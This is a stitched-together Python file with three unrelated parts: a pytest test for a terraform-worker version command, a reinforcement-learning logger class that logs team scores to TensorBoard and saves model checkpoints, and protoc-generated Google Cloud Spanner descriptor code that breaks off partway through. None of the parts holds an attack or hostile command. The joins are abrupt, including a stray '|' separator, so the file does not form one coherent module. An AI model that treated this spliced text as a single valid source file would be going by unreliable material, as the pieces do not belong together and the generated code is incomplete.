# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
from pkg_resources import DistributionNotFound
from tfworker.commands.version import VersionCommand
def mock_get_distribution(package: str):
    """Stand-in for pkg_resources.get_distribution that always fails,
    simulating terraform-worker not being installed as a distribution."""
    raise DistributionNotFound
class TestVersionCommand:
    """Tests for the `version` subcommand's stdout output."""

    def test_exec(self, capsys):
        # Normal path: the version line starts with the fixed prefix.
        VersionCommand().exec()
        text = capsys.readouterr()
        assert text.out.startswith("terraform-worker version")
        # When the distribution metadata cannot be found, the reported
        # version falls back to the literal "unknown".
        with mock.patch(
            "tfworker.commands.version.get_distribution",
            side_effect=mock_get_distribution,
        ):
            VersionCommand().exec()
            text = capsys.readouterr()
            assert text.out == "terraform-worker version unknown\n"
|
import matplotlib.pyplot as plt
from collections import deque
import numpy as np
import torch
import shutil
import os
from CustomSummaryWriter import CustomSummaryWriter
from params import Params
from model import ActorCriticWrapper
class Logger_Team():
    """Simple Logger class to store stats for printing & Tensorboard Visualization (Custom Team Stats)"""

    def __init__(self, params=Params(), tb=CustomSummaryWriter(), agent_ns="Team"):
        # NOTE(review): Params() and CustomSummaryWriter() as default arguments
        # are evaluated once at import time and shared across instances --
        # confirm this is intended.
        self.params = params
        self.agent_ns = agent_ns # Agent's Namespace
        # Per-episode score history: raw last-100 window plus running sums
        # over that window (the "cum" variants).
        self.scores_cum_list = []
        self.scores_deque = deque(maxlen=100)
        self.scores_cum_deque = deque(maxlen=100)
        self.scores_cum_opp_list = []
        self.scores_opp_deque = deque(maxlen=100)
        self.scores_opp_cum_deque = deque(maxlen=100)
        # Win/draw/loss indicators (0/1) for the last 100 matches.
        self.wins_deque = deque(maxlen=100)
        self.draws_deque = deque(maxlen=100)
        self.lose_deque = deque(maxlen=100)
        self.wins_cum_deque = deque(maxlen=100) # Cumulative
        self.draws_cum_deque = deque(maxlen=100) # Cumulative
        self.lose_cum_deque = deque(maxlen=100) # Cumulative
        self.hparam_dict = params.get_hparam_dict()
        self.t = 0
        self.tb = tb
        # torch.autograd.set_detect_anomaly(True)

    def initialize(self, agent, state_size, action_size):
        """ Initializes agent within logger class."""
        self.agent = agent
        if not self.params.restart_training:
            # Resuming: load the configured actor/critic checkpoint weights.
            agent.actor_net.load_state_dict(torch.load("{}/{}".format(self.params.checkpoint_actor_weights_dir, self.params.actor_weights_filename_to_resume)))
            agent.critic_net.load_state_dict(torch.load("{}/{}".format(self.params.checkpoint_critic_weights_dir, self.params.critic_weights_filename_to_resume)))
        else:
            # Fresh run: wipe any previous checkpoint directories.
            self.clear_weights()
        # Initialize network wrapper for model visualization on TensorBoard
        wrapper_net = ActorCriticWrapper(state_size, action_size, self.params)
        self.tb.add_graph(wrapper_net,
                          (torch.zeros(state_size).unsqueeze(0).to(self.params.device)))

    def log_stats(self, episode, team_score, opponent_score):
        """ Log stats onto Tensorboard on every interations """
        self.scores_deque.append(team_score)
        # "Cumulative" = sum over the trailing 100-episode window.
        self.scores_cum_list.append(sum(self.scores_deque))
        self.scores_cum_deque.append(sum(self.scores_deque))
        self.scores_opp_deque.append(opponent_score)
        self.scores_cum_opp_list.append(sum(self.scores_opp_deque))
        self.scores_opp_cum_deque.append(sum(self.scores_opp_deque))
        # One-hot outcome of this match.
        self.wins_deque.append(int(1 if team_score > opponent_score else 0))
        self.draws_deque.append(int(1 if team_score == opponent_score else 0))
        self.lose_deque.append(int(1 if team_score < opponent_score else 0))
        # Outcome counts over the trailing 100-match window.
        self.wins_cum_deque.append(np.count_nonzero(self.wins_deque))
        self.draws_cum_deque.append(np.count_nonzero(self.draws_deque))
        self.lose_cum_deque.append(np.count_nonzero(self.lose_deque))
        # Tensorboard Logging
        self.tb.add_scalar(f"{self.agent_ns}/Score", self.scores_cum_deque[-1], episode)
        self.tb.add_scalar(f"Opponent/Score", self.scores_opp_cum_deque[-1], episode)
        self.tb.add_scalar(f"{self.agent_ns}/Wins", self.wins_cum_deque[-1], episode)
        self.tb.add_scalar(f"{self.agent_ns}/Draws", self.draws_cum_deque[-1], episode)
        self.tb.add_scalar(f"{self.agent_ns}/Loss", self.lose_cum_deque[-1], episode)

    def log_overall_perf_tb(self):
        """ Log overall performance of training cycle """
        # Record the final windowed metrics against the hyperparameters and
        # close the writer.
        self.tb.add_hparams(self.hparam_dict,
                            {
                                f"{self.agent_ns}/Score": self.scores_cum_deque[-1],
                                f"Opponent/Score": self.scores_opp_cum_deque[-1],
                                f"{self.agent_ns}/Wins": self.wins_cum_deque[-1],
                                f"{self.agent_ns}/Draws": self.draws_cum_deque[-1],
                                f"{self.agent_ns}/Loss": self.lose_cum_deque[-1],
                            },
                            )
        self.tb.close()

    def plot_stats(self):
        """ Plots stats recorded """
        print("\n=====", self.agent_ns, "=====")
        _, axs = plt.subplots(2, 3, figsize=(30, 10))
        # Team Scores
        axs[0,0].plot(np.arange(1, len(self.scores_cum_list)+1), self.scores_cum_list)
        axs[0,0].set(xlabel='Episode #', ylabel='Score')
        axs[0,0].set_title(f'{self.agent_ns}/Score')
        # Opponent Scores
        axs[0,1].plot(np.arange(1, len(self.scores_cum_opp_list)+1), self.scores_cum_opp_list)
        axs[0,1].set(xlabel='Episode #', ylabel='Score')
        axs[0,1].set_title(f'Opponent/Score')
        # Wins
        axs[0,2].plot(np.arange(1, len(self.wins_cum_deque)+1), self.wins_cum_deque)
        axs[0,2].set(xlabel='Episode #', ylabel='Wins')
        axs[0,2].set_title(f'{self.agent_ns}/Wins [{len(self.wins_cum_deque)} Matches]')
        # Draws
        axs[1,0].plot(np.arange(1, len(self.draws_cum_deque)+1), self.draws_cum_deque)
        axs[1,0].set(xlabel='Episode #', ylabel='Draws')
        axs[1,0].set_title(f'{self.agent_ns}/Draws [{len(self.draws_cum_deque)} Matches]')
        # Lose
        axs[1,1].plot(np.arange(1, len(self.lose_cum_deque)+1), self.lose_cum_deque)
        axs[1,1].set(xlabel='Episode #', ylabel='Lose')
        axs[1,1].set_title(f'{self.agent_ns}/Lose [{len(self.lose_cum_deque)} Matches]')
        plt.show()

    def clear_weights(self):
        # Remove and recreate both checkpoint directories so a new run
        # starts from empty weight folders.
        if os.path.exists(self.params.checkpoint_actor_weights_dir):
            shutil.rmtree(self.params.checkpoint_actor_weights_dir)
        if os.path.exists(self.params.checkpoint_critic_weights_dir):
            shutil.rmtree(self.params.checkpoint_critic_weights_dir)
        os.makedirs(self.params.checkpoint_actor_weights_dir)
        os.makedirs(self.params.checkpoint_critic_weights_dir)

    def save_weights(self, episode):
        # Checkpoint both networks, tagging the file names with the episode.
        torch.save(self.agent.actor_net.state_dict(), "{}/checkpoint_actor_ep{}.pth".format(self.params.checkpoint_actor_weights_dir, episode))
        torch.save(self.agent.critic_net.state_dict(), "{}/checkpoint_critic_ep{}.pth".format(self.params.checkpoint_critic_weights_dir, episode))

    ####################################################
    # NOTE: Unable to add_graph for multiple graphs.   #
    # https://github.com/lanpa/tensorboardX/issues/319 #
    ####################################################
    # self.tb.add_graph(agent.actor_net, torch.zeros(state_size).to(self.params.device))
    # self.tb.add_graph(agent.critic_net,
    #                   (torch.zeros(state_size).unsqueeze(0).to(self.params.device),
    #                    torch.zeros(action_size).unsqueeze(0).to(self.params.device)))
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/spanner_v1/proto/spanner.proto
import sys
_b = sys.version_info[0] < 3 and (lambda x: x) or (lambda x: x.encode("latin1"))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.api import client_pb2 as google_dot_api_dot_client__pb2
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from google.protobuf import struct_pb2 as google_dot_protobuf_dot_struct__pb2
from google.protobuf import timestamp_pb2 as google_dot_protobuf_dot_timestamp__pb2
from google.rpc import status_pb2 as google_dot_rpc_dot_status__pb2
from google.cloud.spanner_v1.proto import (
keys_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_keys__pb2,
)
from google.cloud.spanner_v1.proto import (
mutation_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_mutation__pb2,
)
from google.cloud.spanner_v1.proto import (
result_set_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2,
)
from google.cloud.spanner_v1.proto import (
transaction_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2,
)
from google.cloud.spanner_v1.proto import (
type_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_type__pb2,
)
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/cloud/spanner_v1/proto/spanner.proto",
package="google.spanner.v1",
syntax="proto3",
serialized_options=_b(
"\n\025com.google.spanner.v1B\014SpannerProtoP\001Z8google.golang.org/genproto/googleapis/spanner/v1;spanner\252\002\027Google.Cloud.Spanner.V1\312\002\027Google\\Cloud\\Spanner\\V1\352A_\n\037spanner.googleapis.com/Database\022<projects/{project}/instances/{instance}/databases/{database}"
),
serialized_pb=_b(
'\n+google/cloud/spanner_v1/proto/spanner.proto\x12\x11google.spanner.v1\x1a\x1cgoogle/api/annotations.proto\x1a\x17google/api/client.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\x1a\x1bgoogle/protobuf/empty.proto\x1a\x1cgoogle/protobuf/struct.proto\x1a\x1fgoogle/protobuf/timestamp.proto\x1a\x17google/rpc/status.proto\x1a(google/cloud/spanner_v1/proto/keys.proto\x1a,google/cloud/spanner_v1/proto/mutation.proto\x1a.google/cloud/spanner_v1/proto/result_set.proto\x1a/google/cloud/spanner_v1/proto/transaction.proto\x1a(google/cloud/spanner_v1/proto/type.proto"~\n\x14\x43reateSessionRequest\x12\x39\n\x08\x64\x61tabase\x18\x01 \x01(\tB\'\xe0\x41\x02\xfa\x41!\n\x1fspanner.googleapis.com/Database\x12+\n\x07session\x18\x02 \x01(\x0b\x32\x1a.google.spanner.v1.Session"\xa9\x01\n\x1a\x42\x61tchCreateSessionsRequest\x12\x39\n\x08\x64\x61tabase\x18\x01 \x01(\tB\'\xe0\x41\x02\xfa\x41!\n\x1fspanner.googleapis.com/Database\x12\x34\n\x10session_template\x18\x02 \x01(\x0b\x32\x1a.google.spanner.v1.Session\x12\x1a\n\rsession_count\x18\x03 \x01(\x05\x42\x03\xe0\x41\x02"J\n\x1b\x42\x61tchCreateSessionsResponse\x12+\n\x07session\x18\x01 \x03(\x0b\x32\x1a.google.spanner.v1.Session"\xe4\x02\n\x07Session\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x36\n\x06labels\x18\x02 \x03(\x0b\x32&.google.spanner.v1.Session.LabelsEntry\x12/\n\x0b\x63reate_time\x18\x03 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12=\n\x19\x61pproximate_last_use_time\x18\x04 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01:t\xea\x41q\n\x1espanner.googleapis.com/Session\x12Oprojects/{project}/instances/{instance}/databases/{database}/sessions/{session}"I\n\x11GetSessionRequest\x12\x34\n\x04name\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session"\x87\x01\n\x13ListSessionsRequest\x12\x39\n\x08\x64\x61tabase\x18\x01 
\x01(\tB\'\xe0\x41\x02\xfa\x41!\n\x1fspanner.googleapis.com/Database\x12\x11\n\tpage_size\x18\x02 \x01(\x05\x12\x12\n\npage_token\x18\x03 \x01(\t\x12\x0e\n\x06\x66ilter\x18\x04 \x01(\t"]\n\x14ListSessionsResponse\x12,\n\x08sessions\x18\x01 \x03(\x0b\x32\x1a.google.spanner.v1.Session\x12\x17\n\x0fnext_page_token\x18\x02 \x01(\t"L\n\x14\x44\x65leteSessionRequest\x12\x34\n\x04name\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session"\x82\x05\n\x11\x45xecuteSqlRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12;\n\x0btransaction\x18\x02 \x01(\x0b\x32&.google.spanner.v1.TransactionSelector\x12\x10\n\x03sql\x18\x03 \x01(\tB\x03\xe0\x41\x02\x12\'\n\x06params\x18\x04 \x01(\x0b\x32\x17.google.protobuf.Struct\x12I\n\x0bparam_types\x18\x05 \x03(\x0b\x32\x34.google.spanner.v1.ExecuteSqlRequest.ParamTypesEntry\x12\x14\n\x0cresume_token\x18\x06 \x01(\x0c\x12\x42\n\nquery_mode\x18\x07 \x01(\x0e\x32..google.spanner.v1.ExecuteSqlRequest.QueryMode\x12\x17\n\x0fpartition_token\x18\x08 \x01(\x0c\x12\r\n\x05seqno\x18\t \x01(\x03\x12H\n\rquery_options\x18\n \x01(\x0b\x32\x31.google.spanner.v1.ExecuteSqlRequest.QueryOptions\x1a)\n\x0cQueryOptions\x12\x19\n\x11optimizer_version\x18\x01 \x01(\t\x1aJ\n\x0fParamTypesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12&\n\x05value\x18\x02 \x01(\x0b\x32\x17.google.spanner.v1.Type:\x02\x38\x01".\n\tQueryMode\x12\n\n\x06NORMAL\x10\x00\x12\x08\n\x04PLAN\x10\x01\x12\x0b\n\x07PROFILE\x10\x02"\xdf\x03\n\x16\x45xecuteBatchDmlRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12@\n\x0btransaction\x18\x02 \x01(\x0b\x32&.google.spanner.v1.TransactionSelectorB\x03\xe0\x41\x02\x12L\n\nstatements\x18\x03 \x03(\x0b\x32\x33.google.spanner.v1.ExecuteBatchDmlRequest.StatementB\x03\xe0\x41\x02\x12\x12\n\x05seqno\x18\x04 \x01(\x03\x42\x03\xe0\x41\x02\x1a\xe7\x01\n\tStatement\x12\x0b\n\x03sql\x18\x01 \x01(\t\x12\'\n\x06params\x18\x02 
\x01(\x0b\x32\x17.google.protobuf.Struct\x12X\n\x0bparam_types\x18\x03 \x03(\x0b\x32\x43.google.spanner.v1.ExecuteBatchDmlRequest.Statement.ParamTypesEntry\x1aJ\n\x0fParamTypesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12&\n\x05value\x18\x02 \x01(\x0b\x32\x17.google.spanner.v1.Type:\x02\x38\x01"p\n\x17\x45xecuteBatchDmlResponse\x12\x31\n\x0bresult_sets\x18\x01 \x03(\x0b\x32\x1c.google.spanner.v1.ResultSet\x12"\n\x06status\x18\x02 \x01(\x0b\x32\x12.google.rpc.Status"H\n\x10PartitionOptions\x12\x1c\n\x14partition_size_bytes\x18\x01 \x01(\x03\x12\x16\n\x0emax_partitions\x18\x02 \x01(\x03"\xa3\x03\n\x15PartitionQueryRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12;\n\x0btransaction\x18\x02 \x01(\x0b\x32&.google.spanner.v1.TransactionSelector\x12\x10\n\x03sql\x18\x03 \x01(\tB\x03\xe0\x41\x02\x12\'\n\x06params\x18\x04 \x01(\x0b\x32\x17.google.protobuf.Struct\x12M\n\x0bparam_types\x18\x05 \x03(\x0b\x32\x38.google.spanner.v1.PartitionQueryRequest.ParamTypesEntry\x12>\n\x11partition_options\x18\x06 \x01(\x0b\x32#.google.spanner.v1.PartitionOptions\x1aJ\n\x0fParamTypesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12&\n\x05value\x18\x02 \x01(\x0b\x32\x17.google.spanner.v1.Type:\x02\x38\x01"\xb1\x02\n\x14PartitionReadRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12;\n\x0btransaction\x18\x02 \x01(\x0b\x32&.google.spanner.v1.TransactionSelector\x12\x12\n\x05table\x18\x03 \x01(\tB\x03\xe0\x41\x02\x12\r\n\x05index\x18\x04 \x01(\t\x12\x0f\n\x07\x63olumns\x18\x05 \x03(\t\x12/\n\x07key_set\x18\x06 \x01(\x0b\x32\x19.google.spanner.v1.KeySetB\x03\xe0\x41\x02\x12>\n\x11partition_options\x18\t \x01(\x0b\x32#.google.spanner.v1.PartitionOptions"$\n\tPartition\x12\x17\n\x0fpartition_token\x18\x01 \x01(\x0c"z\n\x11PartitionResponse\x12\x30\n\npartitions\x18\x01 \x03(\x0b\x32\x1c.google.spanner.v1.Partition\x12\x33\n\x0btransaction\x18\x02 
\x01(\x0b\x32\x1e.google.spanner.v1.Transaction"\xab\x02\n\x0bReadRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12;\n\x0btransaction\x18\x02 \x01(\x0b\x32&.google.spanner.v1.TransactionSelector\x12\x12\n\x05table\x18\x03 \x01(\tB\x03\xe0\x41\x02\x12\r\n\x05index\x18\x04 \x01(\t\x12\x14\n\x07\x63olumns\x18\x05 \x03(\tB\x03\xe0\x41\x02\x12/\n\x07key_set\x18\x06 \x01(\x0b\x32\x19.google.spanner.v1.KeySetB\x03\xe0\x41\x02\x12\r\n\x05limit\x18\x08 \x01(\x03\x12\x14\n\x0cresume_token\x18\t \x01(\x0c\x12\x17\n\x0fpartition_token\x18\n \x01(\x0c"\x8f\x01\n\x17\x42\x65ginTransactionRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12;\n\x07options\x18\x02 \x01(\x0b\x32%.google.spanner.v1.TransactionOptionsB\x03\xe0\x41\x02"\xea\x01\n\rCommitRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12\x18\n\x0etransaction_id\x18\x02 \x01(\x0cH\x00\x12G\n\x16single_use_transaction\x18\x03 \x01(\x0b\x32%.google.spanner.v1.TransactionOptionsH\x00\x12.\n\tmutations\x18\x04 \x03(\x0b\x32\x1b.google.spanner.v1.MutationB\r\n\x0btransaction"F\n\x0e\x43ommitResponse\x12\x34\n\x10\x63ommit_timestamp\x18\x01 \x01(\x0b\x32\x1a.google.protobuf.Timestamp"g\n\x0fRollbackRequest\x12\x37\n\x07session\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 \n\x1espanner.googleapis.com/Session\x12\x1b\n\x0etransaction_id\x18\x02 
\x01(\x0c\x42\x03\xe0\x41\x02\x32\xc0\x16\n\x07Spanner\x12\xa6\x01\n\rCreateSession\x12\'.google.spanner.v1.CreateSessionRequest\x1a\x1a.google.spanner.v1.Session"P\x82\xd3\xe4\x93\x02?":/v1/{database=projects/*/instances/*/databases/*}/sessions:\x01*\xda\x41\x08\x64\x61tabase\x12\xe0\x01\n\x13\x42\x61tchCreateSessions\x12-.google.spanner.v1.BatchCreateSessionsRequest\x1a..google.spanner.v1.BatchCreateSessionsResponse"j\x82\xd3\xe4\x93\x02K"F/v1/{database=projects/*/instances/*/databases/*}/sessions:batchCreate:\x01*\xda\x41\x16\x64\x61tabase,session_count\x12\x97\x01\n\nGetSession\x12$.google.spanner.v1.GetSessionRequest\x1a\x1a.google.spanner.v1.Session"G\x82\xd3\xe4\x93\x02:\x12\x38/v1/{name=projects/*/instances/*/databases/*/sessions/*}\xda\x41\x04name\x12\xae\x01\n\x0cListSessions\x12&.google.spanner.v1.ListSessionsRequest\x1a\'.google.spanner.v1.ListSessionsResponse"M\x82\xd3\xe4\x93\x02<\x12:/v1/{database=projects/*/instances/*/databases/*}/sessions\xda\x41\x08\x64\x61tabase\x12\x99\x01\n\rDeleteSession\x12\'.google.spanner.v1.DeleteSessionRequest\x1a\x16.google.protobuf.Empty"G\x82\xd3\xe4\x93\x02:*8/v1/{name=projects/*/instances/*/databases/*/sessions/*}\xda\x41\x04name\x12\xa3\x01\n\nExecuteSql\x12$.google.spanner.v1.ExecuteSqlRequest\x1a\x1c.google.spanner.v1.ResultSet"Q\x82\xd3\xe4\x93\x02K"F/v1/{session=projects/*/instances/*/databases/*/sessions/*}:executeSql:\x01*\x12\xbe\x01\n\x13\x45xecuteStreamingSql\x12$.google.spanner.v1.ExecuteSqlRequest\x1a#.google.spanner.v1.PartialResultSet"Z\x82\xd3\xe4\x93\x02T"O/v1/{session=projects/*/instances/*/databases/*/sessions/*}:executeStreamingSql:\x01*0\x01\x12\xc0\x01\n\x0f\x45xecuteBatchDml\x12).google.spanner.v1.ExecuteBatchDmlRequest\x1a*.google.spanner.v1.ExecuteBatchDmlResponse"V\x82\xd3\xe4\x93\x02P"K/v1/{session=projects/*/instances/*/databases/*/sessions/*}:executeBatchDml:\x01*\x12\x91\x01\n\x04Read\x12\x1e.google.spanner.v1.ReadRequest\x1a\x1c.google.spanner.v1.ResultSet"K\x82\xd3\xe4\x93\x02\x45"@/v1/
{session=projects/*/instances/*/databases/*/sessions/*}:read:\x01*\x12\xac\x01\n\rStreamingRead\x12\x1e.google.spanner.v1.ReadRequest\x1a#.google.spanner.v1.PartialResultSet"T\x82\xd3\xe4\x93\x02N"I/v1/{session=projects/*/instances/*/databases/*/sessions/*}:streamingRead:\x01*0\x01\x12\xc9\x01\n\x10\x42\x65ginTransaction\x12*.google.spanner.v1.BeginTransactionRequest\x1a\x1e.google.spanner.v1.Transaction"i\x82\xd3\xe4\x93\x02Q"L/v1/{session=projects/*/instances/*/databases/*/sessions/*}:beginTransaction:\x01*\xda\x41\x0fsession,options\x12\xeb\x01\n\x06\x43ommit\x12 .google.spanner.v1.CommitRequest\x1a!.google.spanner.v1.CommitResponse"\x9b\x01\x82\xd3\xe4\x93\x02G"B/v1/{session=projects/*/instances/*/databases/*/sessions/*}:commit:\x01*\xda\x41 session,transaction_id,mutations\xda\x41(session,single_use_transaction,mutations\x12\xb0\x01\n\x08Rollback\x12".google.spanner.v1.RollbackRequest\x1a\x16.google.protobuf.Empty"h\x82\xd3\xe4\x93\x02I"D/v1/{session=projects/*/instances/*/databases/*/sessions/*}:rollback:\x01*\xda\x41\x16session,transaction_id\x12\xb7\x01\n\x0ePartitionQuery\x12(.google.spanner.v1.PartitionQueryRequest\x1a$.google.spanner.v1.PartitionResponse"U\x82\xd3\xe4\x93\x02O"J/v1/{session=projects/*/instances/*/databases/*/sessions/*}:partitionQuery:\x01*\x12\xb4\x01\n\rPartitionRead\x12\'.google.spanner.v1.PartitionReadRequest\x1a$.google.spanner.v1.PartitionResponse"T\x82\xd3\xe4\x93\x02N"I/v1/{session=projects/*/instances/*/databases/*/sessions/*}:partitionRead:\x01*\x1aw\xca\x41\x16spanner.googleapis.com\xd2\x41[https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/spanner.dataB\xf7\x01\n\x15\x63om.google.spanner.v1B\x0cSpannerProtoP\x01Z8google.golang.org/genproto/googleapis/spanner/v1;spanner\xaa\x02\x17Google.Cloud.Spanner.V1\xca\x02\x17Google\\Cloud\\Spanner\\V1\xea\x41_\n\x1fspanner.googleapis.com/Database\x12<projects/{project}/instances/{instance}/databases/{database}b\x06proto3'
),
dependencies=[
google_dot_api_dot_annotations__pb2.DESCRIPTOR,
google_dot_api_dot_client__pb2.DESCRIPTOR,
google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,
google_dot_api_dot_resource__pb2.DESCRIPTOR,
google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,
google_dot_protobuf_dot_struct__pb2.DESCRIPTOR,
google_dot_protobuf_dot_timestamp__pb2.DESCRIPTOR,
google_dot_rpc_dot_status__pb2.DESCRIPTOR,
google_dot_cloud_dot_spanner__v1_dot_proto_dot_keys__pb2.DESCRIPTOR,
google_dot_cloud_dot_spanner__v1_dot_proto_dot_mutation__pb2.DESCRIPTOR,
google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2.DESCRIPTOR,
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2.DESCRIPTOR,
google_dot_cloud_dot_spanner__v1_dot_proto_dot_type__pb2.DESCRIPTOR,
],
)
_EXECUTESQLREQUEST_QUERYMODE = _descriptor.EnumDescriptor(
name="QueryMode",
full_name="google.spanner.v1.ExecuteSqlRequest.QueryMode",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="NORMAL", index=0, number=0, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="PLAN", index=1, number=1, serialized_options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="PROFILE", index=2, number=2, serialized_options=None, type=None
),
],
containing_type=None,
serialized_options=None,
serialized_start=2243,
serialized_end=2289,
)
_sym_db.RegisterEnumDescriptor(_EXECUTESQLREQUEST_QUERYMODE)
_CREATESESSIONREQUEST = _descriptor.Descriptor(
name="CreateSessionRequest",
full_name="google.spanner.v1.CreateSessionRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="database",
full_name="google.spanner.v1.CreateSessionRequest.database",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A!\n\037spanner.googleapis.com/Database"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.CreateSessionRequest.session",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=525,
serialized_end=651,
)
_BATCHCREATESESSIONSREQUEST = _descriptor.Descriptor(
name="BatchCreateSessionsRequest",
full_name="google.spanner.v1.BatchCreateSessionsRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="database",
full_name="google.spanner.v1.BatchCreateSessionsRequest.database",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A!\n\037spanner.googleapis.com/Database"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="session_template",
full_name="google.spanner.v1.BatchCreateSessionsRequest.session_template",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="session_count",
full_name="google.spanner.v1.BatchCreateSessionsRequest.session_count",
index=2,
number=3,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=654,
serialized_end=823,
)
_BATCHCREATESESSIONSRESPONSE = _descriptor.Descriptor(
name="BatchCreateSessionsResponse",
full_name="google.spanner.v1.BatchCreateSessionsResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.BatchCreateSessionsResponse.session",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=825,
serialized_end=899,
)
_SESSION_LABELSENTRY = _descriptor.Descriptor(
name="LabelsEntry",
full_name="google.spanner.v1.Session.LabelsEntry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="google.spanner.v1.Session.LabelsEntry.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="google.spanner.v1.Session.LabelsEntry.value",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=_b("8\001"),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1095,
serialized_end=1140,
)
